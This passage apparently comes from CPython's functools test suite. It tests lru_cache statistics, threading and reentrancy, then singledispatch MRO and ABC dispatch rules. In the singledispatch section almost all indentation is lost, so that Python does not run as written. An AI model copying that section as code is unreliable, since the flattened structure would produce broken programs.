        # Test bypassing the cache: calling __wrapped__ directly must not
        # touch the statistics.
        self.assertIs(f.__wrapped__, orig)
        f.__wrapped__(x, y)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

        # test size zero (which means "never-cache")
        @self.module.lru_cache(0)
        def f():
            nonlocal f_cnt
            f_cnt += 1
            return 20
        self.assertEqual(f.cache_info().maxsize, 0)
        f_cnt = 0
        for i in range(5):
            self.assertEqual(f(), 20)
        self.assertEqual(f_cnt, 5)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 5)
        self.assertEqual(currsize, 0)

        # test size one
        @self.module.lru_cache(1)
        def f():
            nonlocal f_cnt
            f_cnt += 1
            return 20
        self.assertEqual(f.cache_info().maxsize, 1)
        f_cnt = 0
        for i in range(5):
            self.assertEqual(f(), 20)
        self.assertEqual(f_cnt, 1)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 4)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

        # test size two
        @self.module.lru_cache(2)
        def f(x):
            nonlocal f_cnt
            f_cnt += 1
            return x*10
        self.assertEqual(f.cache_info().maxsize, 2)
        f_cnt = 0
        for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
            # misses occur at the first 7, first 9, first 8, and the final
            # 7 (evicted earlier when 8 and 9 filled both slots).
            self.assertEqual(f(x), x*10)
        self.assertEqual(f_cnt, 4)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 12)
        self.assertEqual(misses, 4)
        self.assertEqual(currsize, 2)

    def test_lru_bug_35780(self):
        # C version of the lru_cache was not checking to see if
        # the user function call has already modified the cache
        # (this arises in recursive calls and in multi-threading).
        # This cause the cache to have orphan links not referenced
        # by the cache dictionary.
        once = True                 # Modified by f(x) below
        @self.module.lru_cache(maxsize=10)
        def f(x):
            nonlocal once
            rv = f'.{x}.'
            if x == 20 and once:
                once = False
                rv = f(x)
            return rv
        # Fill the cache
        for x in range(15):
            self.assertEqual(f(x), f'.{x}.')
        self.assertEqual(f.cache_info().currsize, 10)
        # Make a recursive call and make sure the cache remains full
        self.assertEqual(f(20), '.20.')
        self.assertEqual(f.cache_info().currsize, 10)

    def test_lru_hash_only_once(self):
        # To protect against weird reentrancy bugs and to improve
        # efficiency when faced with slow __hash__ methods, the
        # LRU cache guarantees that it will only call __hash__
        # only once per use as an argument to the cached function.
        @self.module.lru_cache(maxsize=1)
        def f(x, y):
            return x * 3 + y
        # Simulate the integer 5
        mock_int = unittest.mock.Mock()
        mock_int.__mul__ = unittest.mock.Mock(return_value=15)
        mock_int.__hash__ = unittest.mock.Mock(return_value=999)
        # Add to cache:  One use as an argument gives one call
        self.assertEqual(f(mock_int, 1), 16)
        self.assertEqual(mock_int.__hash__.call_count, 1)
        self.assertEqual(f.cache_info(), (0, 1, 1, 1))
        # Cache hit: One use as an argument gives one additional call
        self.assertEqual(f(mock_int, 1), 16)
        self.assertEqual(mock_int.__hash__.call_count, 2)
        self.assertEqual(f.cache_info(), (1, 1, 1, 1))
        # Cache eviction: No use as an argument gives no additional call
        self.assertEqual(f(6, 2), 20)
        self.assertEqual(mock_int.__hash__.call_count, 2)
        self.assertEqual(f.cache_info(), (1, 2, 1, 1))
        # Cache miss: One use as an argument gives one additional call
        self.assertEqual(f(mock_int, 1), 16)
        self.assertEqual(mock_int.__hash__.call_count, 3)
        self.assertEqual(f.cache_info(), (1, 3, 1, 1))

    def test_lru_reentrancy_with_len(self):
        # Test to make sure the LRU cache code isn't thrown-off by
        # caching the built-in len() function.  Since len() can be
        # cached, we shouldn't use it inside the lru code itself.
        old_len = builtins.len
        try:
            builtins.len = self.module.lru_cache(4)(len)
            for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
                self.assertEqual(len('abcdefghijklmn'[:i]), i)
        finally:
            builtins.len = old_len

    def test_lru_star_arg_handling(self):
        # Test regression that arose in ea064ff3c10f
        # NOTE(review): uses functools directly rather than self.module,
        # so this runs against the default implementation only.
        @functools.lru_cache()
        def f(*args):
            return args
        self.assertEqual(f(1, 2), (1, 2))
        # A tuple passed as one positional arg is a distinct cache key.
        self.assertEqual(f((1, 2)), ((1, 2),))

    def test_lru_type_error(self):
        # Regression test for issue #28653.
        # lru_cache was leaking when one of the arguments
        # wasn't cacheable.
        @functools.lru_cache(maxsize=None)
        def infinite_cache(o):
            pass

        @functools.lru_cache(maxsize=10)
        def limited_cache(o):
            pass

        # Unhashable arguments raise TypeError for both cache flavors.
        with self.assertRaises(TypeError):
            infinite_cache([])

        with self.assertRaises(TypeError):
            limited_cache([])

    def test_lru_with_maxsize_none(self):
        @self.module.lru_cache(maxsize=None)
        def fib(n):
            if n < 2:
                return n
            return fib(n-1) + fib(n-2)
        self.assertEqual([fib(n) for n in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))

    def test_lru_with_maxsize_negative(self):
        # A negative maxsize is clamped to 0: nothing is ever cached.
        @self.module.lru_cache(maxsize=-10)
        def eq(n):
            return n
        for i in (0, 1):
            self.assertEqual([eq(n) for n in range(150)], list(range(150)))
        self.assertEqual(eq.cache_info(),
            self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))

    def test_lru_with_exceptions(self):
        # Verify that user_function exceptions get passed through without
        # creating a hard-to-read chained exception.
        # http://bugs.python.org/issue13177
        for maxsize in (None, 128):
            @self.module.lru_cache(maxsize)
            def func(i):
                return 'abc'[i]
            self.assertEqual(func(0), 'a')
            with self.assertRaises(IndexError) as cm:
                func(15)
            self.assertIsNone(cm.exception.__context__)
            # Verify that the previous exception did not result in a cached entry
            with self.assertRaises(IndexError):
                func(15)

    def test_lru_with_types(self):
        # typed=True caches 3 and 3.0 separately.
        for maxsize in (None, 128):
            @self.module.lru_cache(maxsize=maxsize, typed=True)
            def square(x):
                return x * x
            self.assertEqual(square(3), 9)
            self.assertEqual(type(square(3)), type(9))
            self.assertEqual(square(3.0), 9.0)
            self.assertEqual(type(square(3.0)), type(9.0))
            self.assertEqual(square(x=3), 9)
            self.assertEqual(type(square(x=3)), type(9))
            self.assertEqual(square(x=3.0), 9.0)
            self.assertEqual(type(square(x=3.0)), type(9.0))
            self.assertEqual(square.cache_info().hits, 4)
            self.assertEqual(square.cache_info().misses, 4)

    def test_lru_with_keyword_args(self):
        @self.module.lru_cache()
        def fib(n):
            if n < 2:
                return n
            return fib(n=n-1) + fib(n=n-2)
        self.assertEqual(
            [fib(n=number) for number in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
        )
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))

    def test_lru_with_keyword_args_maxsize_none(self):
        @self.module.lru_cache(maxsize=None)
        def fib(n):
            if n < 2:
                return n
            return fib(n=n-1) + fib(n=n-2)
        self.assertEqual([fib(n=number) for number in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))

    def test_kwargs_order(self):
        # PEP 468: Preserving Keyword Argument Order -- f(a=1, b=2) and
        # f(b=2, a=1) must be distinct cache entries.
        @self.module.lru_cache(maxsize=10)
        def f(**kwargs):
            return list(kwargs.items())
        self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
        self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
        self.assertEqual(f.cache_info(),
            self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))

    def test_lru_cache_decoration(self):
        # The decorated function keeps the wrapped function's metadata.
        def f(zomg: 'zomg_annotation'):
            """f doc string"""
            return 42
        g = self.module.lru_cache()(f)
        for attr in self.module.WRAPPER_ASSIGNMENTS:
            self.assertEqual(getattr(g, attr), getattr(f, attr))

    def test_lru_cache_threaded(self):
        n, m = 5, 11
        def orig(x, y):
            return 3 * x + y
        f = self.module.lru_cache(maxsize=n*m)(orig)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(currsize, 0)

        start = threading.Event()
        def full(k):
            start.wait(10)
            for _ in range(m):
                self.assertEqual(f(k, 0), orig(k, 0))

        def clear():
            start.wait(10)
            for _ in range(2*m):
                f.cache_clear()

        orig_si = sys.getswitchinterval()
        # Force frequent thread switches to shake out races.
        support.setswitchinterval(1e-6)
        try:
            # create n threads in order to fill cache
            threads = [threading.Thread(target=full, args=[k])
                       for k in range(n)]
            with support.start_threads(threads):
                start.set()

            hits, misses, maxsize, currsize = f.cache_info()
            if self.module is py_functools:
                # XXX: Why can be not equal?
                self.assertLessEqual(misses, n)
                self.assertLessEqual(hits, m*n - misses)
            else:
                self.assertEqual(misses, n)
                self.assertEqual(hits, m*n - misses)
            self.assertEqual(currsize, n)

            # create n threads in order to fill cache and 1 to clear it
            threads = [threading.Thread(target=clear)]
            threads += [threading.Thread(target=full, args=[k])
                        for k in range(n)]
            start.clear()
            with support.start_threads(threads):
                start.set()
        finally:
            sys.setswitchinterval(orig_si)

    def test_lru_cache_threaded2(self):
        # Simultaneous call with the same arguments
        n, m = 5, 7
        start = threading.Barrier(n+1)
        pause = threading.Barrier(n+1)
        stop = threading.Barrier(n+1)
        @self.module.lru_cache(maxsize=m*n)
        def f(x):
            pause.wait(10)
            return 3 * x
        self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
        def test():
            for i in range(m):
                start.wait(10)
                self.assertEqual(f(i), 3 * i)
                stop.wait(10)
        threads = [threading.Thread(target=test) for k in range(n)]
        with support.start_threads(threads):
            for i in range(m):
                start.wait(10)
                stop.reset()
                pause.wait(10)
                start.reset()
                stop.wait(10)
                pause.reset()
                # All n simultaneous calls with argument i count as misses.
                self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))

    def test_lru_cache_threaded3(self):
        @self.module.lru_cache(maxsize=2)
        def f(x):
            time.sleep(.01)
            return 3 * x
        def test(i, x):
            with self.subTest(thread=i):
                self.assertEqual(f(x), 3 * x, i)
        threads = [threading.Thread(target=test, args=(i, v))
                   for i, v in enumerate([1, 2, 2, 3, 2])]
        with support.start_threads(threads):
            pass

    def test_need_for_rlock(self):
        # This will deadlock on an LRU cache that uses a regular lock
        @self.module.lru_cache(maxsize=10)
        def test_func(x):
            'Used to demonstrate a reentrant lru_cache call within a single thread'
            return x

        class DoubleEq:
            'Demonstrate a reentrant lru_cache call within a single thread'
            def __init__(self, x):
                self.x = x
            def __hash__(self):
                return self.x
            def __eq__(self, other):
                # Re-enters the cache during key comparison.
                if self.x == 2:
                    test_func(DoubleEq(1))
                return self.x == other.x

        test_func(DoubleEq(1))                      # Load the cache
        test_func(DoubleEq(2))                      # Load the cache
        self.assertEqual(test_func(DoubleEq(2)),    # Trigger a re-entrant __eq__ call
                         DoubleEq(2))               # Verify the correct return value

    def test_early_detection_of_bad_call(self):
        # Issue #22184: calling lru_cache without parentheses on a plain
        # function used to fail only later, at call time.
        with self.assertRaises(TypeError):
            @functools.lru_cache
            def f():
                pass

    def test_lru_method(self):
        # The cache is shared across instances (keys include self).
        class X(int):
            f_cnt = 0
            @self.module.lru_cache(2)
            def f(self, x):
                self.f_cnt += 1
                return x*10+self
        a = X(5)
        b = X(5)
        c = X(7)
        self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))

        for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
            self.assertEqual(a.f(x), x*10 + 5)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
        self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))

        for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
            self.assertEqual(b.f(x), x*10 + 5)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
        self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))

        for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
            self.assertEqual(c.f(x), x*10 + 7)
        self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
        self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))

        self.assertEqual(a.f.cache_info(), X.f.cache_info())
        self.assertEqual(b.f.cache_info(), X.f.cache_info())
        self.assertEqual(c.f.cache_info(), X.f.cache_info())

    def test_pickle(self):
        # Cached functions pickle by reference (identity round-trip).
        cls = self.__class__
        for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
            for proto in range(pickle.HIGHEST_PROTOCOL + 1):
                with self.subTest(proto=proto, func=f):
                    f_copy = pickle.loads(pickle.dumps(f, proto))
                    self.assertIs(f_copy, f)

    def test_copy(self):
        # copy.copy() of a cached function returns the same object.
        cls = self.__class__
        def orig(x, y):
            return 3 * x + y
        part = self.module.partial(orig, 2)
        funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
                 self.module.lru_cache(2)(part))
        for f in funcs:
            with self.subTest(func=f):
                f_copy = copy.copy(f)
                self.assertIs(f_copy, f)

    def test_deepcopy(self):
        # copy.deepcopy() of a cached function returns the same object.
        cls = self.__class__
        def orig(x, y):
            return 3 * x + y
        part = self.module.partial(orig, 2)
        funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
                 self.module.lru_cache(2)(part))
        for f in funcs:
            with self.subTest(func=f):
                f_copy = copy.deepcopy(f)
                self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
    """Module-level function cached with the pure-Python lru_cache.

    Used by TestLRUPy's pickle/copy identity tests.
    """
    result = 3 * x + y
    return result
@c_functools.lru_cache()
def c_cached_func(x, y):
    """Module-level function cached with the C-accelerated lru_cache.

    Used by TestLRUC's pickle/copy identity tests.
    """
    result = 3 * x + y
    return result
class TestLRUPy(TestLRU, unittest.TestCase):
    """Run the shared lru_cache tests against the pure-Python version."""
    module = py_functools
    cached_func = py_cached_func,  # one-element tuple (note trailing comma)

    @module.lru_cache()
    def cached_meth(self, x, y):
        return 3 * x + y

    @staticmethod
    @module.lru_cache()
    def cached_staticmeth(x, y):
        return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
    """Run the shared lru_cache tests against the C-accelerated version."""
    module = c_functools
    cached_func = c_cached_func,  # one-element tuple (note trailing comma)

    @module.lru_cache()
    def cached_meth(self, x, y):
        return 3 * x + y

    @staticmethod
    @module.lru_cache()
    def cached_staticmeth(x, y):
        return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
    """Handlers can be registered for C-implemented exception classes;
    a later, more specific registration (Subnormal) overrides the base
    (DecimalException) one for matching instances only."""
    @functools.singledispatch
    def g(obj):
        return "base"

    @g.register(decimal.DecimalException)
    def _(obj):
        return obj.args

    subnormal = decimal.Subnormal("Exponent < Emin")
    rounded = decimal.Rounded("Number got rounded")
    self.assertEqual(g(subnormal), ("Exponent < Emin",))
    self.assertEqual(g(rounded), ("Number got rounded",))

    @g.register(decimal.Subnormal)
    def _(obj):
        return "Too small to care."

    self.assertEqual(g(subnormal), "Too small to care.")
    # Rounded is unaffected by the Subnormal-specific registration.
    self.assertEqual(g(rounded), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
